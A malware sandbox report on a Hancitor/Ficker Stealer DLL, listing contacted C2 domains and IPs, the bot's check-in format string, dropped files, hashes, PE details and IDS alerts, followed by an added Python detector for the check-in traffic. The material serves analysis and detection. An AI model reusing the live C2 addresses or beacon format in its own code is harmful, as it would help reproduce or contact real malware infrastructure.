http://sudepallon.com/8/forum.phps | rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php.com/8/forum.phpeBH | rundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.php2 | rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phpq | rundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sudepallon.com/8/forum.phpp | rundll32.exe, 00000003.00000003.468221370.000000000306B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
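The string recovered from rundll32.exe memory, http://api.ipify.org followed by GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), is a printf template for the bot's check-in body: the IP field is the value fetched from api.ipify.org (the dropped kaosdma.txt holds exactly that value), and the report lists /8/forum.php on three domains as the contacted C2 URLs. As an added example that is not part of the Joe Sandbox report, the Python below classifies constructed HTTP request records against that template and those C2 hosts, assuming the body is POSTed to the forum.php path. The request records, the BUILD/INFO/EXT placeholder values and the verdict tiers are assumptions.

```python
"""Classify HTTP requests against the Hancitor check-in template recovered
from rundll32.exe memory in the report:

    GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)

Added example, not part of the Joe Sandbox report. The request records and
their field values are constructed; the C2 path and hosts are the ones the
report lists under "Contacted URLs". The verdict tiers are an assumption.
"""
import re
from urllib.parse import urlsplit

# Key order is fixed by the format string, so an exact, ordered match is the
# strongest body-level signal.
HANCITOR_KEYS = ["GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN"]
# From the report's contacted URLs.
C2_PATH = "/8/forum.php"
C2_HOSTS = {"sudepallon.com", "thentabecon.ru", "anspossthrly.ru"}

WIN_RE = re.compile(r"^\d+\.\d+(?:\(x64\))?$")      # %d.%d(x64)
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")  # value fetched from api.ipify.org

# Constructed requests: (method, url, body). The IP value mirrors the one the
# sandbox wrote to C:\ProgramData\kaosdma.txt; BUILD/INFO/EXT are placeholders.
SAMPLE_REQUESTS = [
    ("POST", "http://sudepallon.com/8/forum.php",
     "GUID=1234567890123456789&BUILD=sample-build&INFO=constructed-host-info"
     "&EXT=0&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)"),
    ("POST", "http://forum.example.org/forum.php", "topic=12&page=2"),
    ("POST", "http://thentabecon.ru/8/forum.php",
     "TYPE=1&GUID=42&BUILD=sample-build&INFO=x&EXT=0&IP=185.189.150.70&WIN=10.0(x64)"),
    ("GET", "http://api.ipify.org/?format=xml", ""),
]


def parse_body(body):
    """Split a form-encoded body into ordered (key, value) pairs without decoding."""
    pairs = []
    for item in body.split("&"):
        key, sep, value = item.partition("=")
        pairs.append((key, value if sep else None))
    return pairs


def classify(method, url, body):
    """Return (verdict, reasons) for one request."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.path == C2_PATH:
        reasons.append("path matches the Hancitor C2 path")
    if host in C2_HOSTS:
        reasons.append("host is a C2 domain listed in the report")

    pairs = parse_body(body)
    keys = [k for k, _ in pairs]
    values = dict(pairs)
    exact = keys == HANCITOR_KEYS
    same_set = set(keys) == set(HANCITOR_KEYS)
    if exact:
        reasons.append("body keys match the format string exactly, in order")
    elif same_set:
        reasons.append("body has all format-string keys but in a different order")
    if same_set:
        # Per-field checks derived from the printf conversions in the template.
        guid = values.get("GUID") or ""
        if guid.isdigit() and int(guid) < 2 ** 64:
            reasons.append("GUID fits %I64u (unsigned 64-bit)")
        if (values.get("TYPE") or "").isdigit():
            reasons.append("TYPE is numeric")
        if WIN_RE.match(values.get("WIN") or ""):
            reasons.append("WIN matches %d.%d(x64)")
        if IPV4_RE.match(values.get("IP") or ""):
            reasons.append("IP is a dotted quad")

    if exact and method.upper() == "POST":
        return "hancitor-checkin", reasons
    if reasons:
        return "suspicious", reasons
    return "none", reasons


def classify_all(requests=SAMPLE_REQUESTS):
    return [classify(*req) for req in requests]


if __name__ == "__main__":
    for (method, url, _), (verdict, reasons) in zip(SAMPLE_REQUESTS, classify_all()):
        print(f"{verdict:17} {method} {url}")
        for reason in reasons:
            print(f"    - {reason}")
```

The body-level match is what makes this usable once the C2 domains rotate (the context tables below show the same actor moving between sudepallon.com and mancause.ru); the host and path checks alone only cover the infrastructure seen in this run, and a forum.php on an unrelated site with unrelated form fields is left alone.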

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
23.21.173.155 | elb097307-934924932.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
23.21.224.49 | unknown | United States | 14618 | AMAZON-AESUS | true
77.222.42.67 | sudepallon.com | Russian Federation | 44112 | SWEB-ASRU | true
8.211.241.0 | srand04rf.ru | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
95.213.179.67 | pospvisis.com | Russian Federation | 49505 | SELECTELRU | true

                              General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 446231
Start date: 09.07.2021
Start time: 03:09:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 11s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: niberius.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winDLL@19/2@11/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 6% (good quality ratio 5.8%)
• Quality average: 88.6%
• Quality standard deviation: 21.2%
HCA Information:
• Successful, ratio: 65%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, UsoClient.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 13.64.90.137, 23.54.113.104, 52.255.188.83, 104.42.151.234, 104.43.139.144, 20.190.160.1, 20.190.160.133, 20.190.160.131, 20.190.160.70, 20.190.160.72, 20.190.160.74, 20.190.160.9, 20.190.160.135, 20.50.102.62
• Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found
• Report size getting too big, too many NtOpenFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found

                              Simulations

                              Behavior and APIs

Time | Type | Description
03:11:15 | API Interceptor | 333x Sleep call for process: rundll32.exe modified
03:11:20 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                              Joe Sandbox View / Context

                              IPs

Match | Associated Sample Name / URL | Detection | Context
23.21.173.155 | triage_dropped_file.dll | malicious | api.ipify.org/
23.21.173.155 | 0708_5355150121.xll | malicious | api.ipify.org/
23.21.173.155 | file.doc | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.doc | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.224.49 | file.doc | malicious | api.ipify.org/?format=xml
23.21.224.49 | niberius.dll | malicious | api.ipify.org/
23.21.224.49 | nimb.dll | malicious | api.ipify.org/
23.21.224.49 | file.doc | malicious | api.ipify.org/
23.21.224.49 | kiks.dll | malicious | api.ipify.org/?format=xml
23.21.224.49 | file.dll | malicious | api.ipify.org/?format=xml
23.21.224.49 | triage_dropped_file.dll | malicious | api.ipify.org/
77.222.42.67 | 0708_3355614568218.doc | malicious | sudepallon.com/8/forum.php
77.222.42.67 | triage_dropped_file.dll | malicious | sudepallon.com/8/forum.php
77.222.42.67 | 08.jpg.exe | malicious | sudepallon.com/8/forum.php
77.222.42.67 | 0708_5355150121.xll | malicious | sudepallon.com/8/forum.php
77.222.42.67 | triage_dropped_file.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | nimb.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | 0706_1050501748839.doc | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.doc | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.doc | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.doc | malicious | mancause.ru/8/forum.php

                              Domains

Match | Associated Sample Name / URL | Detection | Context
elb097307-934924932.us-east-1.elb.amazonaws.com | 0708_3355614568218.doc | malicious | 50.19.92.227
elb097307-934924932.us-east-1.elb.amazonaws.com | RUxuwqYQMM.exe | malicious | 54.235.88.121
elb097307-934924932.us-east-1.elb.amazonaws.com | 1R1aRTRnis.exe | malicious | 54.243.175.83
elb097307-934924932.us-east-1.elb.amazonaws.com | triage_dropped_file.dll | malicious | 54.225.78.40
elb097307-934924932.us-east-1.elb.amazonaws.com | 08.jpg.exe | malicious | 50.19.92.227
elb097307-934924932.us-east-1.elb.amazonaws.com | 0708_5355150121.xll | malicious | 23.21.173.155
elb097307-934924932.us-east-1.elb.amazonaws.com | OTzccW5OZg.exe | malicious | 50.16.226.23
elb097307-934924932.us-east-1.elb.amazonaws.com | ve88CBNzQZ.dll | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | triage_dropped_file.dll | malicious | 54.235.175.90
elb097307-934924932.us-east-1.elb.amazonaws.com | nimb.dll | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | 0706_1050501748839.doc | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | file.dll | malicious | 23.21.136.132
elb097307-934924932.us-east-1.elb.amazonaws.com | file.doc | malicious | 23.21.211.162
elb097307-934924932.us-east-1.elb.amazonaws.com | file.doc | malicious | 23.21.136.132
elb097307-934924932.us-east-1.elb.amazonaws.com | file.dll | malicious | 54.235.121.178
elb097307-934924932.us-east-1.elb.amazonaws.com | file.doc | malicious | 50.16.246.238
elb097307-934924932.us-east-1.elb.amazonaws.com | 0706_1715044809783.doc | malicious | 54.235.175.90
elb097307-934924932.us-east-1.elb.amazonaws.com | niberius.dll | malicious | 50.16.218.217
elb097307-934924932.us-east-1.elb.amazonaws.com | nimb.dll | malicious | 54.225.78.40
elb097307-934924932.us-east-1.elb.amazonaws.com | 4h2yLkN8DO.dll | malicious | 23.23.104.250
srand04rf.ru | 0708_3355614568218.doc | malicious | 8.211.241.0
srand04rf.ru | triage_dropped_file.dll | malicious | 8.211.241.0
srand04rf.ru | 0708_5355150121.xll | malicious | 8.211.241.0
srand04rf.ru | aCWkTdaR6G.dll | malicious | 8.209.119.208
srand04rf.ru | 0616_433887484261.doc | malicious | 8.209.119.208
srand04rf.ru | omsh.dll | malicious | 8.209.119.208
srand04rf.ru | omsh_.dll | malicious | 8.209.119.208
srand04rf.ru | omh.dll | malicious | 8.209.119.208
srand04rf.ru | 0616_1338797754728.doc | malicious | 8.209.119.208
pospvisis.com | 0708_3355614568218.doc | malicious | 95.213.179.67
pospvisis.com | triage_dropped_file.dll | malicious | 95.213.179.67
pospvisis.com | nimb.dll | malicious | 95.213.179.67
pospvisis.com | 0706_1050501748839.doc | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.doc | malicious | 95.213.179.67
pospvisis.com | file.doc | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.doc | malicious | 95.213.179.67
pospvisis.com | 0706_1715044809783.doc | malicious | 95.213.179.67
pospvisis.com | niberius.dll | malicious | 95.213.179.67
pospvisis.com | niberius.dll | malicious | 95.213.179.67
pospvisis.com | 0701_1866962341645.doc | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67
pospvisis.com | file.dll | malicious | 95.213.179.67

                              ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-AESUS | 0708_3355614568218.doc | malicious | 23.21.211.162
AMAZON-AESUS | RUxuwqYQMM.exe | malicious | 54.235.88.121
AMAZON-AESUS | 1R1aRTRnis.exe | malicious | 23.21.224.49
AMAZON-AESUS | triage_dropped_file.dll | malicious | 54.235.121.178
AMAZON-AESUS | paskoocheh-android.apk | malicious | 50.17.170.49
AMAZON-AESUS | paskoocheh-android.apk | malicious | 34.225.210.187
AMAZON-AESUS | 08.jpg.exe | malicious | 50.19.92.227
AMAZON-AESUS | 0708_5355150121.xll | malicious | 23.21.173.155
AMAZON-AESUS | OTzccW5OZg.exe | malicious | 50.16.216.118
AMAZON-AESUS | ve88CBNzQZ.dll | malicious | 50.16.216.118
AMAZON-AESUS | FQ4jzOGrg6udVQoV9d7S.exe | malicious | 3.223.125.168
AMAZON-AESUS | FQ4jzOGrg6udVQoV9d7S.exe | malicious | 3.223.125.168
AMAZON-AESUS | triage_dropped_file.dll | malicious | 54.225.245.108
AMAZON-AESUS | nimb.dll | malicious | 54.235.175.90
AMAZON-AESUS | 0706_1050501748839.doc | malicious | 50.16.216.118
AMAZON-AESUS | file.dll | malicious | 50.16.220.248
AMAZON-AESUS | file.doc | malicious | 23.21.173.155
AMAZON-AESUS | file.doc | malicious | 50.16.246.238
AMAZON-AESUS | file.dll | malicious | 54.225.245.108
AMAZON-AESUS | file.doc | malicious | 50.16.246.238
SWEB-ASRU | 0708_3355614568218.doc | malicious | 77.222.42.67
SWEB-ASRU | triage_dropped_file.dll | malicious | 77.222.42.67
SWEB-ASRU | 08.jpg.exe | malicious | 77.222.42.67
SWEB-ASRU | 0708_5355150121.xll | malicious | 77.222.42.67
SWEB-ASRU | triage_dropped_file.dll | malicious | 77.222.42.67
SWEB-ASRU | nimb.dll | malicious | 77.222.42.67
SWEB-ASRU | 0706_1050501748839.doc | malicious | 77.222.42.67
SWEB-ASRU | file.dll | malicious | 77.222.42.67
SWEB-ASRU | file.doc | malicious | 77.222.42.67
SWEB-ASRU | file.doc | malicious | 77.222.42.67
SWEB-ASRU | file.dll | malicious | 77.222.42.67
SWEB-ASRU | file.doc | malicious | 77.222.42.67
SWEB-ASRU | jax.k.dll | malicious | 77.222.52.246
SWEB-ASRU | 0526_28522894410229.doc | malicious | 77.222.52.246
SWEB-ASRU | 0526_1488782409783.doc | malicious | 77.222.52.246
SWEB-ASRU | 0526_17568640710485.doc | malicious | 77.222.52.246
SWEB-ASRU | 0526_4618771472215.doc | malicious | 77.222.52.246
SWEB-ASRU | 0526_1488782409783.doc | malicious | 77.222.52.246
SWEB-ASRU | jax.k.dll | malicious | 77.222.52.246
SWEB-ASRU | 180000.dll | malicious | 77.222.52.246

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\kaosdma.txt
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):14
                              Entropy (8bit):2.699513850319966
                              Encrypted:false
                              SSDEEP:3:EQgNQVLSV:EQgNAi
                              MD5:A1924933759C1451D5C265A1AAE417BB
                              SHA1:51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF
                              SHA-256:14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
                              SHA-512:4D0DD0054634B744F7EDCFFEDB17E17FCB6B4D7B269BD6F23CB6275802D0AF42CC0460AFAF9D3539E23B0EA9673A7DBA30FF35AFAED68BDF86B3EBE15C9DF3F5
                              Malicious:false
                              Reputation:low
                              Preview: 185.189.150.70
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RCR7H9R6.txt
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):14
                              Entropy (8bit):2.699513850319966
                              Encrypted:false
                              SSDEEP:3:EQgNQVLSV:EQgNAi
                              MD5:A1924933759C1451D5C265A1AAE417BB
                              SHA1:51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF
                              SHA-256:14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
                              SHA-512:4D0DD0054634B744F7EDCFFEDB17E17FCB6B4D7B269BD6F23CB6275802D0AF42CC0460AFAF9D3539E23B0EA9673A7DBA30FF35AFAED68BDF86B3EBE15C9DF3F5
                              Malicious:false
                              IE Cache URL:http://api.ipify.org/?format=xml
                              Preview: 185.189.150.70

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.490962289954401
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:niberius.dll
                              File size:274432
                              MD5:d22d8bb38cf8d6a5ce6d8be4106350e7
                              SHA1:02fc51e6572a17f5dbbc32c4e3dd03cca3c51afe
                              SHA256:4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557
                              SHA512:434e6b553bb96c5ae6b26d22cc35614f248f93a442e702395ce925578598bdf74eb884daf5a40d6c02cb1769eaf3dfdf858205e0c7b64f8afda38574991fcc41
                              SSDEEP:3072:c+dVxycTZ+1ohyeQB7qZDZtOet+vWEY+mq2MBcCWBM0NYgJKUFfn+rY+FYs:c+HZ+10yjBOtdt+vW/q2UINHJK5dYs
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+...+...+....o..=....o......"... ...+..._....o.......o..*....o..*....o..*...Rich+...........PE..L....D.D...........!.......

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x101b829
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x1000000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:
                              Time Stamp:0x44AE44FC [Fri Jul 7 11:26:52 2006 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:7c563cc34a5ec19fda679d5f10cd6773

                              Entrypoint Preview

                              Instruction
                              cmp dword ptr [esp+08h], 01h
                              jne 00007FA1D8879557h
                              call 00007FA1D8882F76h
                              push dword ptr [esp+04h]
                              mov ecx, dword ptr [esp+10h]
                              mov edx, dword ptr [esp+0Ch]
                              call 00007FA1D8879442h
                              pop ecx
                              retn 000Ch
                              push eax
                              push dword ptr fs:[00000000h]
                              lea eax, dword ptr [esp+0Ch]
                              sub esp, dword ptr [esp+0Ch]
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [eax], ebp
                              mov ebp, eax
                              mov eax, dword ptr [0103C470h]
                              xor eax, ebp
                              push eax
                              push dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFFh
                              lea eax, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              push eax
                              push dword ptr fs:[00000000h]
                              lea eax, dword ptr [esp+0Ch]
                              sub esp, dword ptr [esp+0Ch]
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [eax], ebp
                              mov ebp, eax
                              mov eax, dword ptr [0103C470h]
                              xor eax, ebp
                              push eax
                              mov dword ptr [ebp-10h], esp
                              push dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFFh
                              lea eax, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              push eax
                              push dword ptr fs:[00000000h]
                              lea eax, dword ptr [esp+0Ch]
                              sub esp, dword ptr [esp+0Ch]
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [eax], ebp
                              mov ebp, eax
                              mov eax, dword ptr [0103C470h]
                              xor eax, ebp
                              push eax
                              mov dword ptr [ebp-10h], eax
                              push dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFFh
                              lea eax, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              mov ecx, dword ptr [ebp-0Ch]
                              mov dword ptr fs:[00000000h], ecx

                              Rich Headers

                              Programming Language:
                              • [RES] VS2005 build 50727
                              • [ C ] VS2005 build 50727
                              • [C++] VS2005 build 50727
                              • [EXP] VS2005 build 50727
                              • [ASM] VS2005 build 50727
                              • [LNK] VS2005 build 50727
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3b010 | 0x82 | .rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a62c | 0x78 | .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xdd000 | 0xb20 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xde000 | 0x25c8 | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2d240 | 0x1c | .rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x38cd0 | 0x40 | .rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2d000 | 0x1b8 | .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

                              Sections

                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0x2b69d | 0x2c000 | False | 0.584927645597 | data | 6.64614943801 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata | 0x2d000 | 0xe092 | 0xf000 | False | 0.571858723958 | data | 5.90297265035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data | 0x3c000 | 0xa0028 | 0x2000 | False | 0.262817382812 | data | 3.18088743735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc | 0xdd000 | 0xb20 | 0x1000 | False | 0.271240234375 | data | 2.68221673058 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0xde000 | 0x372e | 0x4000 | False | 0.481750488281 | data | 4.87419588787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              Name | RVA | Size | Type | Language | Country
                              RT_DIALOG | 0xdd1f0 | 0x130 | data | English | United States
                              RT_DIALOG | 0xdd320 | 0xb8 | data | English | United States
                              RT_DIALOG | 0xdd3d8 | 0x124 | data | English | United States
                              RT_DIALOG | 0xdd500 | 0xf6 | data | English | United States
                              RT_DIALOG | 0xdd5f8 | 0xbc | data | English | United States
                              RT_DIALOG | 0xdd6b8 | 0xf0 | data | English | United States
                              RT_DIALOG | 0xdd7a8 | 0xc8 | data | English | United States
                              RT_DIALOG | 0xdd870 | 0x130 | data | English | United States
                              RT_MANIFEST | 0xdd9a0 | 0x17d | XML 1.0 document text | English | United States

                              Imports

                              DLL | Import
                              KERNEL32.dll | CreateProcessA, GetSystemDirectoryA, VirtualProtect, GetCurrentDirectoryA, GetTempPathA, SetConsoleCP, GetModuleFileNameA, GetEnvironmentVariableA, GetModuleHandleA, SetFileAttributesA, CreateFileA, GetLocaleInfoW, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, LoadLibraryA, FormatMessageA, GetSystemTimeAsFileTime, SetSystemPowerState, GetProcessHeap, HeapSize, CloseHandle, SetFilePointer, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, Sleep, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, HeapFree, RtlUnwind, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentThreadId, GetCommandLineA, GetVersionExA, GetCPInfo, LCMapStringA, LCMapStringW, GetACP, GetOEMCP, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, ExitProcess, WriteFile, GetStdHandle, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, GetStringTypeA, GetStringTypeW, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetConsoleCP, GetConsoleMode
                              USER32.dll | ValidateRect, PostMessageA, InvalidateRect, BeginPaint, DestroyMenu, GetSystemMetrics, MapWindowPoints
                              ole32.dll | CoInitialize, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize
                              ADVAPI32.dll | RegCloseKey, RegCreateKeyA, RegOpenKeyExA, RegQueryValueExW
                              UxTheme.dll | OpenThemeData, GetThemeTextExtent, CloseThemeData

                              Exports

                              Name | Ordinal | Address
                              Exercisefound | 1 | 0x1011530
                              Forwardlow | 2 | 0x1012b80
                              More | 3 | 0x1012940
                              Overhuge | 4 | 0x1012800

                              Possible Origin

                              Language of compilation system | Country where language is spoken
                              English | United States

                              Network Behavior

                              Snort IDS Alerts

                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                              07/09/21-03:11:21.366039 | TCP | 2031074 | ET TROJAN Win32/Ficker Stealer Activity | 80 | 49727 | 95.213.179.67 | 192.168.2.3
                              07/09/21-03:11:21.368458 | TCP | 2031132 | ET TROJAN Win32/Ficker Stealer Activity M3 | 49727 | 80 | 192.168.2.3 | 95.213.179.67
                              07/09/21-03:11:23.363477 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.3 | 8.8.8.8
                              07/09/21-03:11:56.225914 | TCP | 2031074 | ET TROJAN Win32/Ficker Stealer Activity | 80 | 49788 | 95.213.179.67 | 192.168.2.3
                              07/09/21-03:11:56.226309 | TCP | 2031132 | ET TROJAN Win32/Ficker Stealer Activity M3 | 49788 | 80 | 192.168.2.3 | 95.213.179.67

                              Network Port Distribution

                              TCP Packets


                              UDP Packets


                              ICMP Packets

                              Timestamp | Source IP | Dest IP | Checksum | Code | Type
                              Jul 9, 2021 03:11:23.363476992 CEST | 192.168.2.3 | 8.8.8.8 | cff0 | (Port unreachable) | Destination Unreachable

                              DNS Queries

                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                              Jul 9, 2021 03:11:12.916574955 CEST | 192.168.2.3 | 8.8.8.8 | 0xc066 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
